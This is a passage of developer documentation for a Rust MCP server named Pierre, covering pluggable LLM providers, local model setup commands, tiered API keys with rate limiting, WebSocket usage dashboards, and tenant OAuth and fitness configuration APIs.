/// Google Gemini provider with full tool calling support
Gemini(GeminiProvider),
/// Groq provider for fast, cost-effective inference
Groq(GroqProvider),
/// Local LLM provider via OpenAI-compatible API (Ollama, vLLM, LocalAI)
Local(OpenAiCompatibleProvider),
}
impl ChatProvider {
/// Create a provider from environment configuration
///
/// Reads `PIERRE_LLM_PROVIDER` to determine which provider to use:
/// - `groq` (default): Creates `GroqProvider` (requires `GROQ_API_KEY`)
/// - `gemini`: Creates `GeminiProvider` (requires `GEMINI_API_KEY`)
/// - `local`/`ollama`/`vllm`/`localai`: Creates `OpenAiCompatibleProvider`
pub fn from_env() -> Result<Self, AppError> {
let provider_type = LlmProviderType::from_env();
info!(
"Initializing LLM provider: {} (set {} to change)",
provider_type,
LlmProviderType::ENV_VAR
);
match provider_type {
LlmProviderType::Groq => Self::groq(),
LlmProviderType::Gemini => Self::gemini(),
LlmProviderType::Local => Self::local(),
}
}
/// Create a local LLM provider (Ollama, vLLM, LocalAI)
pub fn local() -> Result<Self, AppError> {
Ok(Self::Local(OpenAiCompatibleProvider::from_env()?))
}
/// Create a Gemini provider explicitly
pub fn gemini() -> Result<Self, AppError> {
Ok(Self::Gemini(GeminiProvider::from_env()?))
}
/// Create a Groq provider explicitly
pub fn groq() -> Result<Self, AppError> {
Ok(Self::Groq(GroqProvider::from_env()?))
}
}
}
Message Types
MessageRole
Enum representing conversation roles:
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub enum MessageRole {
System,
User,
Assistant,
}
impl MessageRole {
pub const fn as_str(&self) -> &'static str {
match self {
Self::System => "system",
Self::User => "user",
Self::Assistant => "assistant",
}
}
}
}
ChatMessage
Individual message in a conversation:
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ChatMessage {
pub role: MessageRole,
pub content: String,
}
impl ChatMessage {
/// Create a system message
pub fn system(content: impl Into<String>) -> Self {
Self::new(MessageRole::System, content)
}
/// Create a user message
pub fn user(content: impl Into<String>) -> Self {
Self::new(MessageRole::User, content)
}
/// Create an assistant message
pub fn assistant(content: impl Into<String>) -> Self {
Self::new(MessageRole::Assistant, content)
}
}
}
ChatRequest (Builder Pattern)
Request configuration using the builder pattern:
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ChatRequest {
pub messages: Vec<ChatMessage>,
pub model: Option<String>,
pub temperature: Option<f32>,
pub max_tokens: Option<u32>,
pub stream: bool,
}
impl ChatRequest {
/// Create a new chat request with messages
pub const fn new(messages: Vec<ChatMessage>) -> Self {
Self {
messages,
model: None,
temperature: None,
max_tokens: None,
stream: false,
}
}
/// Set the model to use
pub fn with_model(mut self, model: impl Into<String>) -> Self {
self.model = Some(model.into());
self
}
/// Set the temperature (const fn - no allocation)
pub const fn with_temperature(mut self, temperature: f32) -> Self {
self.temperature = Some(temperature);
self
}
/// Set the maximum tokens (const fn)
pub const fn with_max_tokens(mut self, max_tokens: u32) -> Self {
self.max_tokens = Some(max_tokens);
self
}
/// Enable streaming (const fn)
pub const fn with_streaming(mut self) -> Self {
self.stream = true;
self
}
}
}
Groq Provider Implementation
The Groq provider uses an OpenAI-compatible API for fast inference:
Source: src/llm/groq.rs
Configuration
#![allow(unused)]
fn main() {
/// Environment variable for Groq API key
const GROQ_API_KEY_ENV: &str = "GROQ_API_KEY";
/// Default model to use
const DEFAULT_MODEL: &str = "llama-3.3-70b-versatile";
/// Available Groq models
const AVAILABLE_MODELS: &[&str] = &[
"llama-3.3-70b-versatile",
"llama-3.1-8b-instant",
"llama-3.1-70b-versatile",
"mixtral-8x7b-32768",
"gemma2-9b-it",
];
/// Base URL for the Groq API (OpenAI-compatible)
const API_BASE_URL: &str = "https://api.groq.com/openai/v1";
}
Capabilities
#![allow(unused)]
fn main() {
#[async_trait]
impl LlmProvider for GroqProvider {
fn name(&self) -> &'static str {
"groq"
}
fn display_name(&self) -> &'static str {
"Groq (Llama/Mixtral)"
}
fn capabilities(&self) -> LlmCapabilities {
// Groq supports streaming, function calling, and system messages
// but does not support vision (yet)
LlmCapabilities::STREAMING
| LlmCapabilities::FUNCTION_CALLING
| LlmCapabilities::SYSTEM_MESSAGES
| LlmCapabilities::JSON_MODE
}
fn default_model(&self) -> &'static str {
DEFAULT_MODEL
}
fn available_models(&self) -> &'static [&'static str] {
AVAILABLE_MODELS
}
}
}
Gemini Provider Implementation
The Gemini provider supports full-featured capabilities including vision:
Source: src/llm/gemini.rs
Configuration
#![allow(unused)]
fn main() {
/// Environment variable for Gemini API key
const GEMINI_API_KEY_ENV: &str = "GEMINI_API_KEY";
/// Default model to use
const DEFAULT_MODEL: &str = "gemini-2.5-flash";
/// Available Gemini models
const AVAILABLE_MODELS: &[&str] = &[
"gemini-2.5-flash",
"gemini-2.0-flash-exp",
"gemini-1.5-pro",
"gemini-1.5-flash",
"gemini-1.0-pro",
];
/// Base URL for the Gemini API
const API_BASE_URL: &str = "https://generativelanguage.googleapis.com/v1beta";
}
System Message Handling
Gemini handles system messages differently - via a separate system_instruction field:
#![allow(unused)]
fn main() {
impl GeminiProvider {
/// Convert chat messages to Gemini format
fn convert_messages(messages: &[ChatMessage]) -> (Vec<GeminiContent>, Option<GeminiContent>) {
let mut contents = Vec::new();
let mut system_instruction = None;
for message in messages {
if message.role == MessageRole::System {
// Gemini uses separate system_instruction field
system_instruction = Some(GeminiContent {
role: None,
parts: vec![ContentPart::Text {
text: message.content.clone(),
}],
});
} else {
contents.push(GeminiContent {
role: Some(Self::convert_role(message.role).to_owned()),
parts: vec![ContentPart::Text {
text: message.content.clone(),
}],
});
}
}
(contents, system_instruction)
}
/// Convert our message role to Gemini's role format
const fn convert_role(role: MessageRole) -> &'static str {
match role {
MessageRole::System | MessageRole::User => "user",
MessageRole::Assistant => "model",
}
}
}
}
Debug Implementation (API Key Redaction)
Never expose API keys in logs:
#![allow(unused)]
fn main() {
impl std::fmt::Debug for GeminiProvider {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
f.debug_struct("GeminiProvider")
.field("default_model", &self.default_model)
.field("api_key", &"[REDACTED]")
// Omit `client` field as HTTP clients are not useful to debug
.finish_non_exhaustive()
}
}
}
OpenAI-Compatible Provider (Local LLM)
The OpenAiCompatibleProvider enables integration with any OpenAI-compatible API, including local LLM servers.
Source: src/llm/openai_compatible.rs
Use Cases
- Privacy-first deployments: Run LLMs locally without sending data to cloud
- Cost optimization: Use local hardware instead of API credits
- Air-gapped environments: Deploy in networks without internet access
- Custom models: Use fine-tuned or specialized models
Configuration
#![allow(unused)]
fn main() {
/// Default base URL (Ollama)
const DEFAULT_BASE_URL: &str = "http://localhost:11434/v1";
/// Default model for local inference
const DEFAULT_MODEL: &str = "qwen2.5:14b-instruct";
/// Connection timeout for local servers (more lenient than cloud)
const CONNECT_TIMEOUT_SECS: u64 = 30;
/// Request timeout (local inference can be slower)
const REQUEST_TIMEOUT_SECS: u64 = 300;
}
Setup Examples
Ollama (default):
# Start Ollama server
ollama serve
# Pull a model
ollama pull qwen2.5:14b-instruct
# Configure Pierre
export PIERRE_LLM_PROVIDER=local
# Uses defaults: http://localhost:11434/v1 and qwen2.5:14b-instruct
vLLM:
# Start vLLM server
vllm serve meta-llama/Llama-3.1-8B-Instruct --api-key token-abc123
# Configure Pierre
export PIERRE_LLM_PROVIDER=local
export LOCAL_LLM_BASE_URL=http://localhost:8000/v1
export LOCAL_LLM_MODEL=meta-llama/Llama-3.1-8B-Instruct
export LOCAL_LLM_API_KEY=token-abc123
LocalAI:
# Start LocalAI with a model
docker run -p 8080:8080 localai/localai:latest
# Configure Pierre
export PIERRE_LLM_PROVIDER=local
export LOCAL_LLM_BASE_URL=http://localhost:8080/v1
export LOCAL_LLM_MODEL=gpt-3.5-turbo # LocalAI model name
Implementation
#![allow(unused)]
fn main() {
pub struct OpenAiCompatibleProvider {
client: Client,
base_url: String,
model: String,
api_key: Option<String>,
}
impl OpenAiCompatibleProvider {
/// Create provider from environment variables
pub fn from_env() -> Result<Self, AppError> {
let base_url = env::var(LOCAL_LLM_BASE_URL_ENV)
.unwrap_or_else(|_| DEFAULT_BASE_URL.to_owned());
let model = env::var(LOCAL_LLM_MODEL_ENV)
.unwrap_or_else(|_| DEFAULT_MODEL.to_owned());
let api_key = env::var(LOCAL_LLM_API_KEY_ENV).ok();
info!(
"Initializing OpenAI-compatible provider: base_url={}, model={}",
base_url, model
);
let client = Client::builder()
.connect_timeout(Duration::from_secs(CONNECT_TIMEOUT_SECS))
.timeout(Duration::from_secs(REQUEST_TIMEOUT_SECS))
.build()
.map_err(|e| AppError::internal(format!("HTTP client error: {e}")))?;
Ok(Self {
client,
base_url,
model,
api_key,
})
}
}
#[async_trait]
impl LlmProvider for OpenAiCompatibleProvider {
fn name(&self) -> &'static str {
"local"
}
fn display_name(&self) -> &'static str {
"Local LLM (OpenAI-compatible)"
}
fn capabilities(&self) -> LlmCapabilities {
// Local providers typically support all features (model-dependent)
LlmCapabilities::STREAMING
| LlmCapabilities::FUNCTION_CALLING
| LlmCapabilities::SYSTEM_MESSAGES
| LlmCapabilities::JSON_MODE
}
}
}
Streaming Support
The provider supports SSE streaming for real-time responses:
#![allow(unused)]
fn main() {
async fn complete_stream(&self, request: &ChatRequest) -> Result<ChatStream, AppError> {
let url = format!("{}/chat/completions", self.base_url);
let openai_request = self.build_request(request, true);
let response = self.client
.post(&url)
.json(&openai_request)
.send()
.await?;
// Parse SSE stream
let stream = response
.bytes_stream()
.map(|result| {
// Parse "data: {json}" SSE format
// Handle [DONE] marker
});
Ok(Box::pin(stream))
}
}
Tool/Function Calling
All three providers support tool calling for structured interactions:
#![allow(unused)]
fn main() {
/// Complete a chat request with function calling support
pub async fn complete_with_tools(
&self,
request: &ChatRequest,
tools: Option<Vec<Tool>>,
) -> Result<ChatResponseWithTools, AppError> {
match self {
Self::Gemini(provider) => provider.complete_with_tools(request, tools).await,
Self::Groq(provider) => provider.complete_with_tools(request, tools).await,
Self::Local(provider) => provider.complete_with_tools(request, tools).await,
}
}
}
Tool Definition
#![allow(unused)]
fn main() {
/// Tool definition for function calling
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Tool {
pub function_declarations: Vec<FunctionDeclaration>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FunctionDeclaration {
pub name: String,
pub description: String,
pub parameters: Option<serde_json::Value>,
}
}
Recipe Generation Integration
Pierre uses LLM providers for the “Combat des Chefs” recipe architecture:
LLM Clients (Claude, ChatGPT)
External LLM clients generate recipes themselves:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ LLM Client │────▶│ Pierre MCP │────▶│ USDA │
│ (Claude) │ │ Server │ │ Database │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
│ 1. get_recipe_ │ │
│ constraints │ │
│───────────────────▶│ │
│ │ │
│ 2. Returns macro │ │
│ targets, hints │ │
│◀───────────────────│ │
│ │ │
│ [LLM generates │ │
│ recipe locally] │ │
│ │ │
│ 3. validate_ │ │
│ recipe │ │
│───────────────────▶│ │
│ │ Lookup nutrition │
│ │───────────────────▶│
│ │◀───────────────────│
│ 4. Validation │ │
│ result + macros│ │
│◀───────────────────│ │
Non-LLM Clients
For clients without LLM capabilities, Pierre uses its internal LLM:
#![allow(unused)]
fn main() {
// The suggest_recipe tool uses Pierre's configured LLM
let provider = ChatProvider::from_env()?;
let recipe = generate_recipe_with_llm(&provider, constraints).await?;
}
Error Handling
All LLM operations use structured error types:
#![allow(unused)]
fn main() {
// Good: Structured errors
return Err(AppError::config(format!(
"{GROQ_API_KEY_ENV} environment variable not set"
)));
return Err(AppError::external_service(
"Groq",
format!("API error ({status}): {error_text}"),
));
return Err(AppError::internal("No content in response"));
// Bad: Never use anyhow! in production code
// return Err(anyhow!("API failed")); // FORBIDDEN
}
Testing LLM Providers
Tests are in tests/llm_test.rs (not in src/ per project conventions):
#![allow(unused)]
fn main() {
#[test]
fn test_capabilities_full_featured() {
let caps = LlmCapabilities::full_featured();
assert!(caps.supports_streaming());
assert!(caps.supports_function_calling());
assert!(caps.supports_vision());
assert!(caps.supports_json_mode());
assert!(caps.supports_system_messages());
}
#[test]
fn test_gemini_debug_redacts_api_key() {
let provider = GeminiProvider::new("super-secret-key");
let debug_output = format!("{provider:?}");
assert!(!debug_output.contains("super-secret-key"));
assert!(debug_output.contains("[REDACTED]"));
}
#[test]
fn test_chat_request_builder() {
let request = ChatRequest::new(vec![ChatMessage::user("Hello")])
.with_model("llama-3.3-70b-versatile")
.with_temperature(0.7)
.with_max_tokens(1000)
.with_streaming();
assert_eq!(request.model, Some("llama-3.3-70b-versatile".to_string()));
assert!(request.stream);
}
}
Run tests:
cargo test --test llm_test -- --nocapture
Adding a New Provider
To add a new LLM provider:
- Create the provider file (
src/llm/my_provider.rs):
#![allow(unused)]
fn main() {
pub struct MyProvider {
api_key: String,
client: Client,
}
#[async_trait]
impl LlmProvider for MyProvider {
fn name(&self) -> &'static str { "myprovider" }
fn display_name(&self) -> &'static str { "My Provider" }
fn capabilities(&self) -> LlmCapabilities {
LlmCapabilities::STREAMING | LlmCapabilities::SYSTEM_MESSAGES
}
// ... implement all trait methods
}
}
- Export from mod.rs:
#![allow(unused)]
fn main() {
mod my_provider;
pub use my_provider::MyProvider;
}
- Add to ChatProvider enum in
src/llm/provider.rs:
#![allow(unused)]
fn main() {
pub enum ChatProvider {
Gemini(GeminiProvider),
Groq(GroqProvider),
MyProvider(MyProvider), // Add variant
}
}
- Update environment config in
src/config/environment.rs:
#![allow(unused)]
fn main() {
pub enum LlmProviderType {
Groq,
Gemini,
MyProvider, // Add variant
}
}
- Add tests in
tests/llm_test.rs
Best Practices
- API Key Security: Always redact in Debug impls, never log
- Capability Checks: Query capabilities before using features
- Timeout Handling: Configure appropriate timeouts for HTTP clients
- Rate Limiting: Respect provider rate limits (Groq: 12K TPM on free tier)
- Error Context: Provide meaningful error messages
- Streaming: Prefer streaming for long responses
- Model Selection: Allow users to override default models
- Provider Selection: Use Groq for cost-effective inference, Gemini for vision
Summary
The LLM provider architecture provides:
- Runtime Selection:
ChatProviderselects provider from environment - Pluggable Design: Add providers without changing consumer code
- Capability Detection: Query features at runtime
- Type Safety: Structured messages and responses
- Streaming Support: SSE-based streaming responses
- Tool Calling: Both providers support function calling
- Recipe Integration: Powers the “Combat des Chefs” architecture
- Security: API key redaction built-in
See Also
- LLM Providers Reference
- Tools Reference - Recipe Management
- Chapter 17.5: Pluggable Provider Architecture
- Chapter 2: Error Handling
- Appendix H: Error Reference
Chapter 27: API Keys, Rate Limiting & Real-Time Dashboard
This appendix covers Pierre’s B2B API key system, unified rate limiting engine, and real-time usage dashboard/WebSocket updates. You’ll learn how API keys are modeled, how quotas and bursts are enforced, and how the dashboard surfaces this information to end users.
API Key Model & Tiers
Pierre exposes a B2B API via API keys that carry their own tier and quota metadata.
Source: src/api_keys.rs:19-75
#![allow(unused)]
fn main() {
/// API Key tiers with rate limits
#[non_exhaustive]
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "lowercase")]
pub enum ApiKeyTier {
/// Trial tier - 1,000 requests/month, auto-expires in 14 days
Trial,
/// Starter tier - 10,000 requests/month
Starter,
/// Professional tier - 100,000 requests/month
Professional,
/// Enterprise tier - Unlimited requests
Enterprise,
}
impl ApiKeyTier {
/// Returns the monthly API request limit for this tier
#[must_use]
pub const fn monthly_limit(&self) -> Option<u32> {
match self {
Self::Trial => Some(TRIAL_MONTHLY_LIMIT),
Self::Starter => Some(STARTER_MONTHLY_LIMIT),
Self::Professional => Some(PROFESSIONAL_MONTHLY_LIMIT),
Self::Enterprise => None, // Unlimited
}
}
/// Returns the rate limit window duration in seconds
#[must_use]
pub const fn rate_limit_window(&self) -> u32 {
RATE_LIMIT_WINDOW_SECONDS // 30 days in seconds
}
/// Default expiration in days for trial keys
#[must_use]
pub const fn default_trial_days(&self) -> Option<i64> {
match self {
Self::Trial => Some(TRIAL_PERIOD_DAYS),
_ => None,
}
}
}
}
Tier semantics:
- Trial: 1,000 requests/month, auto-expires after
TRIAL_PERIOD_DAYS. - Starter: 10,000 requests/month (
STARTER_MONTHLY_LIMIT). - Professional: 100,000 requests/month (
PROFESSIONAL_MONTHLY_LIMIT). - Enterprise: Unlimited (
monthly_limit() -> None).
API Key Structure
Each API key stores its hashed value, tier, and rate limiting parameters.
Source: src/api_keys.rs:77-121
#![allow(unused)]
fn main() {
/// API Key model
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ApiKey {
/// Unique identifier for the API key
pub id: String,
/// ID of the user who owns this key
pub user_id: Uuid,
/// Human-readable name for the key
pub name: String,
/// Visible prefix of the key for identification
pub key_prefix: String,
/// SHA-256 hash of the full key for verification
pub key_hash: String,
/// Optional description of the key's purpose
pub description: Option<String>,
/// Tier level determining rate limits
pub tier: ApiKeyTier,
/// Maximum requests allowed in the rate limit window
pub rate_limit_requests: u32,
/// Rate limit window duration in seconds
pub rate_limit_window_seconds: u32,
/// Whether the key is currently active
pub is_active: bool,
/// When the key was last used
pub last_used_at: Option<DateTime<Utc>>,
/// When the key expires (if set)
pub expires_at: Option<DateTime<Utc>>,
/// When the key was created
pub created_at: DateTime<Utc>,
}
}
Design choices:
- Hashed storage: Only the SHA-256 hash is stored (
key_hash); the full key is returned once at creation. - Prefix:
key_prefixlets the dashboard identify which key made a request without revealing the whole key. - Tier + limit:
tierencodes semantic tier (trial/starter/…), whilerate_limit_requestsstores the actual numeric limit for flexibility.
Unified Rate Limiting Engine
The unified rate limiting engine applies the same logic to both API keys and JWT-authenticated users.
Source: src/rate_limiting.rs:22-60
#![allow(unused)]
fn main() {
/// Rate limit information for any authentication method
#[derive(Debug, Clone, Serialize)]
pub struct UnifiedRateLimitInfo {
/// Whether the request is rate limited
pub is_rate_limited: bool,
/// Maximum requests allowed in the current period
pub limit: Option<u32>,
/// Remaining requests in the current period
pub remaining: Option<u32>,
/// When the current rate limit period resets
pub reset_at: Option<DateTime<Utc>>,
/// The tier associated with this rate limit
pub tier: String,
/// The authentication method used
pub auth_method: String,
}
}
Key idea: whether a request is authenticated via API key or JWT, the same rate limiting structure is used, so downstream code can render consistent responses, dashboard metrics, and WebSocket updates.
Tenant-Level Limit Tiers
Tenants have their own rate limit tiers layered on top of key-level limits.
Source: src/rate_limiting.rs:62-116
#![allow(unused)]
fn main() {
/// Tenant-specific rate limit tier configuration
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TenantRateLimitTier {
/// Base monthly request limit
pub monthly_limit: u32,
/// Requests per minute burst limit
pub burst_limit: u32,
/// Rate limit multiplier for this tenant (1.0 = normal, 2.0 = double)
pub multiplier: f32,
/// Whether tenant has unlimited requests
pub unlimited: bool,
/// Custom reset period in seconds (None = monthly)
pub custom_reset_period: Option<u64>,
}
impl TenantRateLimitTier {
/// Create tier configuration for starter tenants
#[must_use]
pub const fn starter() -> Self { /* ... */ }
/// Create tier configuration for professional tenants
#[must_use]
pub const fn professional() -> Self { /* ... */ }
/// Create tier configuration for enterprise tenants
#[must_use]
pub const fn enterprise() -> Self { /* ... */ }
/// Apply multiplier to get effective monthly limit
#[must_use]
pub fn effective_monthly_limit(&self) -> u32 {
if self.unlimited {
u32::MAX
} else {
(self.monthly_limit as f32 * self.multiplier) as u32
}
}
}
}
Patterns:
- Per-tenant limits: SaaS plans map to
starter(),professional(),enterprise(). - Multipliers:
multiplierallows custom boosts for specific tenants (e.g., 2× quota during migration). - Unlimited:
unlimited = truemaps tou32::MAXeffective limit.
WebSocket Real-Time Updates
The WebSocket subsystem streams API usage and rate limit status in real time to dashboards.
Source: src/websocket.rs:23-74
#![allow(unused)]
fn main() {
/// WebSocket message types for real-time communication
#[non_exhaustive]
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "type")]
pub enum WebSocketMessage {
/// Client authentication message
#[serde(rename = "auth")]
Authentication { token: String },
/// Subscribe to specific topics
#[serde(rename = "subscribe")]
Subscribe { topics: Vec<String> },
/// API key usage update notification
#[serde(rename = "usage_update")]
UsageUpdate {
api_key_id: String,
requests_today: u64,
requests_this_month: u64,
rate_limit_status: Value,
},
/// System-wide statistics update
#[serde(rename = "system_stats")]
SystemStats {
total_requests_today: u64,
total_requests_this_month: u64,
active_connections: usize,
},
/// Error message to client
#[serde(rename = "error")]
Error { message: String },
/// Success confirmation message
#[serde(rename = "success")]
Success { message: String },
}
}
Topics:
usage_update: per-key usage and currentUnifiedRateLimitInfostatus.system_stats: aggregate metrics for all keys (e.g., for an admin dashboard).auth/subscribe: initial handshake; clients authenticate then opt into topics.
WebSocket Manager
The WebSocketManager coordinates authentication, subscriptions, and broadcast.
Source: src/websocket.rs:76-115
#![allow(unused)]
fn main() {
/// Manages WebSocket connections and message broadcasting
#[derive(Clone)]
pub struct WebSocketManager {
database: Arc<Database>,
auth_middleware: McpAuthMiddleware,
clients: Arc<RwLock<HashMap<Uuid, ClientConnection>>>,
broadcast_tx: broadcast::Sender<WebSocketMessage>,
}
impl WebSocketManager {
/// Creates a new WebSocket manager instance
#[must_use]
pub fn new(
database: Arc<Database>,
auth_manager: &Arc<AuthManager>,
jwks_manager: &Arc<crate::admin::jwks::JwksManager>,
rate_limit_config: crate::config::environment::RateLimitConfig,
) -> Self {
let (broadcast_tx, _) =
broadcast::channel(crate::constants::rate_limits::WEBSOCKET_CHANNEL_CAPACITY);
let auth_middleware = McpAuthMiddleware::new(
(**auth_manager).clone(),
database.clone(),
jwks_manager.clone(),
rate_limit_config,
);
Self {
database,
auth_middleware,
clients: Arc::new(RwLock::new(HashMap::new())),
broadcast_tx,
}
}
}
}
Flow:
- Client connects to WebSocket endpoint and sends
Authentication { token }. WebSocketManagerverifies token viaMcpAuthMiddleware.- Client sends
Subscribe { topics }(e.g.,"usage_update","system_stats"). - Server periodically pushes
UsageUpdateandSystemStatsmessages.
Dashboard Overview & Analytics
The dashboard HTTP routes expose human-friendly analytics built on top of usage and rate limiting data.
Source: src/dashboard_routes.rs:16-73
#![allow(unused)]
fn main() {
/// Dashboard overview with key metrics and recent activity
#[derive(Debug, Serialize)]
pub struct DashboardOverview {
pub total_api_keys: u32,
pub active_api_keys: u32,
pub total_requests_today: u64,
pub total_requests_this_month: u64,
pub current_month_usage_by_tier: Vec<TierUsage>,
pub recent_activity: Vec<RecentActivity>,
}
/// Usage statistics for a specific tier
#[derive(Debug, Serialize)]
pub struct TierUsage {
pub tier: String,
pub key_count: u32,
pub total_requests: u64,
pub average_requests_per_key: f64,
}
/// Recent API activity entry
#[derive(Debug, Serialize)]
pub struct RecentActivity {
pub timestamp: chrono::DateTime<Utc>,
pub api_key_name: String,
pub tool_name: String,
pub status_code: i32,
pub response_time_ms: Option<i32>,
}
}
Additional structs like UsageAnalytics, UsageDataPoint, ToolUsage, RateLimitOverview, and RequestLog provide time series and per-tool breakdowns used by the frontend dashboard to render charts and tables.
How This Ties Into MCP Tools
From the MCP side, API key and rate limit status surfaces via:
- WebSocket: Real-time updates for dashboards and observability tools.
- HTTP analytics routes: JSON endpoints consumed by the dashboard frontend.
- A2A / tools: Internal tools can introspect rate limit status when generating explanations (e.g., “you hit your trial quota”).
Typical workflow for a B2B integrator:
- Create API key using admin UI or REST route.
- Use key as
Authorization: Bearer <api_key>when calling Pierre MCP HTTP endpoints. - Monitor usage via dashboard or WebSocket feed.
- Upgrade tier (trial → starter → professional) to unlock higher quotas.
Key Takeaways
- API keys: Tiered API keys with hashed storage and explicit monthly limits enable safe B2B access.
- Unified rate limiting:
UnifiedRateLimitInfoabstracts over API key vs JWT, ensuring consistent quota behavior. - Tenant tiers:
TenantRateLimitTieraugments per-key limits with SaaS plan semantics. - Real-time updates: WebSockets stream
UsageUpdateandSystemStatsmessages for live dashboards. - Dashboard models:
DashboardOverview,UsageAnalytics, and related structs power the analytics UI. - Observability: Combined HTTP + WebSocket surfaces make it easy to monitor usage, spot abuse, and tune quotas.
Chapter 28: Tenant Admin APIs & Fitness Configuration
This appendix explains Pierre’s tenant administration HTTP APIs and how tenant-scoped fitness configurations are managed. You’ll see how tenants, OAuth apps, and fitness configs are modeled and exposed via REST routes.
Tenant Management APIs
Tenants represent logical customers or organizations in the Pierre platform. The tenant routes provide CRUD-style operations for tenants and their OAuth settings.
Creating Tenants
Source: src/tenant_routes.rs:27-57
#![allow(unused)]
fn main() {
/// Request body for creating a new tenant
#[derive(Debug, Deserialize)]
pub struct CreateTenantRequest {
/// Display name for the tenant
pub name: String,
/// URL-safe slug identifier for the tenant
pub slug: String,
/// Optional custom domain for the tenant
pub domain: Option<String>,
/// Subscription plan (basic, pro, enterprise)
pub plan: Option<String>,
}
/// Response containing created tenant details
#[derive(Debug, Serialize)]
pub struct CreateTenantResponse {
pub tenant_id: String,
pub name: String,
pub slug: String,
pub domain: Option<String>,
pub created_at: String,
/// API endpoint URL for this tenant
pub api_endpoint: String,
}
}
Usage: an admin-facing HTTP route accepts CreateTenantRequest, persists the tenant, and returns CreateTenantResponse with a derived API endpoint URL (e.g., https://api.pierre.ai/t/{slug} or custom domain).
Listing Tenants
Source: src/tenant_routes.rs:59-84
#![allow(unused)]
fn main() {
/// Response containing list of tenants with pagination
#[derive(Debug, Serialize)]
pub struct TenantListResponse {
/// List of tenant summaries
pub tenants: Vec<TenantSummary>,
/// Total number of tenants
pub total_count: usize,
}
/// Summary information about a tenant
#[derive(Debug, Serialize)]
pub struct TenantSummary {
pub tenant_id: String,
pub name: String,
pub slug: String,
pub domain: Option<String>,
pub plan: String,
pub created_at: String,
/// List of configured OAuth providers
pub oauth_providers: Vec<String>,
}
}
The list endpoint returns lightweight TenantSummary objects, including which OAuth providers are currently configured for each tenant.
Tenant OAuth Credential Management
Per-tenant OAuth credentials allow each tenant to bring their own Strava/Fitbit apps instead of sharing a global client ID/secret.
Source: src/tenant_routes.rs:86-124
#![allow(unused)]
fn main() {
/// Request to configure OAuth provider credentials for a tenant
#[derive(Debug, Deserialize)]
pub struct ConfigureTenantOAuthRequest {
/// OAuth provider name (e.g., "strava", "fitbit")
pub provider: String,
/// OAuth client ID from provider
pub client_id: String,
/// OAuth client secret from provider
pub client_secret: String,
/// Redirect URI for OAuth callbacks
pub redirect_uri: String,
/// OAuth scopes to request
pub scopes: Vec<String>,
/// Optional daily rate limit
pub rate_limit_per_day: Option<u32>,
}
/// Response after configuring OAuth provider
#[derive(Debug, Serialize)]
pub struct ConfigureTenantOAuthResponse {
pub provider: String,
pub client_id: String,
pub redirect_uri: String,
pub scopes: Vec<String>,
pub configured_at: String,
}
}
Flow:
- Admin calls
POST /api/tenants/{tenant_id}/oauthwithConfigureTenantOAuthRequest. - Server validates provider, encrypts
client_secret, and storesTenantOAuthCredentials. - Response returns non-sensitive fields (client ID, redirect URI, scopes, timestamp).
- Later,
TenantOAuthManager(see Chapter 16) resolves tenant-specific credentials when performing provider OAuth flows.
Listing Tenant OAuth Providers
Source: src/tenant_routes.rs:126-161
#![allow(unused)]
fn main() {
/// List of OAuth providers configured for a tenant
#[derive(Debug, Serialize)]
pub struct TenantOAuthListResponse {
/// Configured OAuth providers
pub providers: Vec<TenantOAuthProvider>,
}
/// OAuth provider configuration details
#[derive(Debug, Serialize)]
pub struct TenantOAuthProvider {
pub provider: String,
pub client_id: String,
pub redirect_uri: String,
pub scopes: Vec<String>,
pub configured_at: String,
pub enabled: bool,
}
}
This view powers an admin UI where operators can confirm which providers are active per tenant, rotate credentials, or temporarily disable a misconfigured provider.
OAuth App Registration for MCP Clients
Beyond provider OAuth, Pierre exposes an OAuth server (Chapter 15) for MCP clients themselves. Tenant routes provide a convenience wrapper to register OAuth apps.
Source: src/tenant_routes.rs:163-205
#![allow(unused)]
fn main() {
/// Request to register a new OAuth application
#[derive(Debug, Deserialize)]
pub struct RegisterOAuthAppRequest {
/// Application name
pub name: String,
/// Optional application description
pub description: Option<String>,
/// Allowed redirect URIs for OAuth callbacks
pub redirect_uris: Vec<String>,
/// Requested OAuth scopes (e.g., mcp:read, mcp:write, a2a:read)
pub scopes: Vec<String>,
/// Application type (desktop, web, mobile, server)
pub app_type: String,
}
/// Response containing registered OAuth application credentials
#[derive(Debug, Serialize)]
pub struct RegisterOAuthAppResponse {
pub client_id: String,
pub client_secret: String,
pub name: String,
pub app_type: String,
pub authorization_url: String,
pub token_url: String,
pub created_at: String,
}
}
Pattern: tenants can programmatically register OAuth clients to integrate their own MCP tooling with Pierre, receiving a client_id/client_secret and the relevant auth/token endpoints.
Fitness Configuration APIs
The fitness configuration routes expose tenant- and user-scoped configuration blobs used by the intelligence layer (e.g., thresholds, algorithm choices, personalized presets).
Models
Source: src/fitness_configuration_routes.rs:15-64
#![allow(unused)]
fn main() {
/// Request to save fitness configuration
#[derive(Debug, Deserialize)]
pub struct SaveFitnessConfigRequest {
/// Configuration name (defaults to "default")
pub configuration_name: Option<String>,
/// Fitness configuration data
pub configuration: FitnessConfig,
}
/// Response containing fitness configuration details
#[derive(Debug, Serialize)]
pub struct FitnessConfigurationResponse {
pub id: String,
pub tenant_id: String,
pub user_id: Option<String>,
pub configuration_name: String,
pub configuration: FitnessConfig,
pub created_at: String,
pub updated_at: String,
pub metadata: ResponseMetadata,
}
/// Response containing list of available fitness configurations
#[derive(Debug, Serialize)]
pub struct FitnessConfigurationListResponse {
pub configurations: Vec<String>,
pub total_count: usize,
pub metadata: ResponseMetadata,
}
}
FitnessConfig (from crate::config::fitness_config) holds the actual structured configuration (zones, algorithm selection enums, etc.), while the routes add multi-tenant context and standard response metadata.
Listing Configurations
Source: src/fitness_configuration_routes.rs:90-141
#![allow(unused)]
fn main() {
/// Fitness configuration routes handler
